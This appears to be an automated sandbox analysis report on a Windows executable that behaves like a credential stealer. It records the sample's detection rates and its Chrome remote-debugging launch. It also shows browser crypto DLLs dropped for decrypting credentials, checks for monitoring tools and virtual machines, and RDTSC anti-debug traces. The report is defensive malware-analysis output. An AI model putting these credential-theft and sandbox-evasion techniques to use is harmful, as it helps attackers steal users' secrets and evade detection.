              Source: 0vsAIy0DhJ.exe, 00000000.00000003.1840969003.0000000005855000.00000004.00000020.00020000.00000000.sdmp, HIJJDGDHDGDAKFIECFIJ.0.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2008760591.0000000005963000.00000004.00000020.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015070712.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2008760591.0000000005963000.00000004.00000020.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015070712.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
              Source: 0vsAIy0DhJ.exe | ReversingLabs: Detection: 65%
              Source: 0vsAIy0DhJ.exe | Virustotal: Detection: 63%
              Source: 0vsAIy0DhJ.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: 0vsAIy0DhJ.exe | String found in binary or memory: -AdD+gL
              Source: unknown | Process created: C:\Users\user\Desktop\0vsAIy0DhJ.exe "C:\Users\user\Desktop\0vsAIy0DhJ.exe"
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=2160,i,1634129405105479003,15236246413488024638,262144 /prefetch:8
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: wininet.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: rstrtmgr.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: iertutil.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: urlmon.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: srvcli.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: netutils.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: ntmarta.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: mozglue.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: wsock32.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: vcruntime140.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: msvcp140.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Section loaded: vcruntime140.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
              Source: 0vsAIy0DhJ.exe | Static file information: File size 1785344 > 1048576
              Source: 0vsAIy0DhJ.exe | Static PE information: Raw size of ncgncztn is bigger than: 0x100000 < 0x199800
              Source: Binary string: mozglue.pdbP source: 0vsAIy0DhJ.exe, 00000000.00000002.2015932243.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
              Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
              Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
              Source: Binary string: nss3.pdb@ source: 0vsAIy0DhJ.exe, 00000000.00000002.2015541853.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
              Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
              Source: Binary string: nss3.pdb source: 0vsAIy0DhJ.exe, 00000000.00000002.2015541853.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
              Source: Binary string: mozglue.pdb source: 0vsAIy0DhJ.exe, 00000000.00000002.2015932243.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
              Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

              Data Obfuscation

              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Unpacked PE file: 0.2.0vsAIy0DhJ.exe.510000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ncgncztn:EW;uazdyszd:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ncgncztn:EW;uazdyszd:EW;.taggant:EW;
              Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
              Source: 0vsAIy0DhJ.exe | Static PE information: real checksum: 0x1b8b32 should be: 0x1bb150
              Source: 0vsAIy0DhJ.exe | Static PE information: section name:
              Source: 0vsAIy0DhJ.exe | Static PE information: section name: .idata
              Source: 0vsAIy0DhJ.exe | Static PE information: section name:
              Source: 0vsAIy0DhJ.exe | Static PE information: section name: ncgncztn
              Source: 0vsAIy0DhJ.exe | Static PE information: section name: uazdyszd
              Source: 0vsAIy0DhJ.exe | Static PE information: section name: .taggant
              Source: freebl3.dll.0.dr | Static PE information: section name: .00cfg
              Source: freebl3[1].dll.0.dr | Static PE information: section name: .00cfg
              Source: mozglue.dll.0.dr | Static PE information: section name: .00cfg
              Source: mozglue[1].dll.0.dr | Static PE information: section name: .00cfg
              Source: msvcp140.dll.0.dr | Static PE information: section name: .didat
              Source: msvcp140[1].dll.0.dr | Static PE information: section name: .didat
              Source: nss3.dll.0.dr | Static PE information: section name: .00cfg
              Source: nss3[1].dll.0.dr | Static PE information: section name: .00cfg
              Source: softokn3.dll.0.dr | Static PE information: section name: .00cfg
              Source: softokn3[1].dll.0.dr | Static PE information: section name: .00cfg
              Source: 0vsAIy0DhJ.exe | Static PE information: section name: ncgncztn entropy: 7.953603443473185
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File created: C:\ProgramData\mozglue.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File created: C:\ProgramData\nss3.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File created: C:\ProgramData\msvcp140.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File created: C:\ProgramData\freebl3.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File created: C:\ProgramData\vcruntime140.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File created: C:\ProgramData\softokn3.dll

              Boot Survival

              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Window searched: window name: Regmonclass
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Window searched: window name: Filemonclass

              Malware Analysis System Evasion

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 919EF6 second address: 919F00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007EFD88B5ADB6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 91911A second address: 919120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9171EB second address: 9171F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 91A04D second address: 91A0E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88CA6411h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnp 00007EFD88CA6423h 0x00000010 jne 00007EFD88CA641Dh 0x00000016 nop 0x00000017 add bx, 3911h 0x0000001c push dword ptr fs:[00000000h] 0x00000023 sub dword ptr [ebp+122D3525h], ebx 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007EFD88CA6408h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 0000001Ch 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a mov eax, dword ptr [ebp+122D0415h] 0x00000050 xor dword ptr [ebp+1245D313h], edx 0x00000056 push FFFFFFFFh 0x00000058 push ebx 0x00000059 sub dword ptr [ebp+122D17F0h], esi 0x0000005f pop ebx 0x00000060 nop 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 push esi 0x00000065 pop esi 0x00000066 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 91AFCE second address: 91AFD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 91A0E0 second address: 91A0E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9171F1 second address: 917261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 push dword ptr fs:[00000000h] 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007EFD88B5ADB8h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a cmc 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 or edi, dword ptr [ebp+12450F8Ah] 0x00000038 mov eax, dword ptr [ebp+122D0A71h] 0x0000003e xor ebx, dword ptr [ebp+122D38B5h] 0x00000044 push FFFFFFFFh 0x00000046 mov di, 2511h 0x0000004a mov dword ptr [ebp+122D1F94h], edi 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007EFD88B5ADC5h 0x00000058 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 91A0E4 second address: 91A0FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 91BF6A second address: 91BFF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007EFD88B5ADB8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 ja 00007EFD88B5ADCFh 0x00000028 push 00000000h 0x0000002a mov dword ptr [ebp+122D2AADh], ecx 0x00000030 push 00000000h 0x00000032 jmp 00007EFD88B5ADC8h 0x00000037 sub ebx, 7D6433B4h 0x0000003d xchg eax, esi 0x0000003e jnc 00007EFD88B5ADCAh 0x00000044 pushad 0x00000045 jmp 00007EFD88B5ADC0h 0x0000004a pushad 0x0000004b popad 0x0000004c popad 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push esi 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 91BFF6 second address: 91BFFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 91BFFB second address: 91C005 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007EFD88B5ADB6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 91E001 second address: 91E007 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 91E8EC second address: 91E8F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 8C2474 second address: 8C24BC instructions: 0x00000000 rdtsc 0x00000002 jg 00007EFD88CA6408h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jnc 00007EFD88CA6406h 0x00000013 jmp 00007EFD88CA6418h 0x00000018 push eax 0x00000019 pop eax 0x0000001a popad 0x0000001b pushad 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e push eax 0x0000001f pop eax 0x00000020 jmp 00007EFD88CA6410h 0x00000025 push eax 0x00000026 pop eax 0x00000027 popad 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9286E7 second address: 9286EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9286EB second address: 9286FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 932C06 second address: 932C0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 93214D second address: 932151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9322B1 second address: 9322B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9322B5 second address: 9322BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 932713 second address: 932749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD88B5ADBFh 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007EFD88B5ADBEh 0x00000013 jmp 00007EFD88B5ADC0h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 932749 second address: 932753 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9328CF second address: 9328D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 932A54 second address: 932A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 932A5A second address: 932A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 932A5E second address: 932A75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFD88CA6412h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9361CF second address: 9361E9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007EFD88B5ADC4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 905112 second address: 905186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edi 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007EFD88CA6408h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 pushad 0x00000024 movsx eax, si 0x00000027 popad 0x00000028 mov edx, dword ptr [ebp+122D3659h] 0x0000002e lea eax, dword ptr [ebp+12478E8Ch] 0x00000034 call 00007EFD88CA6414h 0x00000039 mov ecx, 7CE34789h 0x0000003e pop ecx 0x0000003f nop 0x00000040 jmp 00007EFD88CA6417h 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 905186 second address: 90519E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD88B5ADC3h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 90573B second address: 905770 instructions: 0x00000000 rdtsc 0x00000002 jp 00007EFD88CA641Bh 0x00000008 jmp 00007EFD88CA6415h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007EFD88CA6410h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 905770 second address: 9057C1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFD88B5ADCDh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007EFD88B5ADB8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push 72C80A20h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push esi 0x0000002f pop esi 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9057C1 second address: 9057CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88CA640Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 9058A4 second address: 9058A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 905944 second address: 905983 instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFD88CA6408h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], esi 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007EFD88CA6408h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 sub ecx, dword ptr [ebp+122D38F1h] 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 jo 00007EFD88CA6408h 0x00000036 push edi 0x00000037 pop edi 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 905A62 second address: 905A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 905C45 second address: 905C8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007EFD88CA6412h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007EFD88CA6408h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 cmc 0x00000029 push 00000004h 0x0000002b and edx, 659C2E83h 0x00000031 push eax 0x00000032 pushad 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 905FE6 second address: 906034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007EFD88B5ADB6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007EFD88B5ADC7h 0x00000012 nop 0x00000013 mov edx, dword ptr [ebp+122D2AD8h] 0x00000019 push 0000001Eh 0x0000001b add dword ptr [ebp+122D3525h], ecx 0x00000021 nop 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007EFD88B5ADC8h 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 906034 second address: 906039 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 906169 second address: 906176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d rdtsc
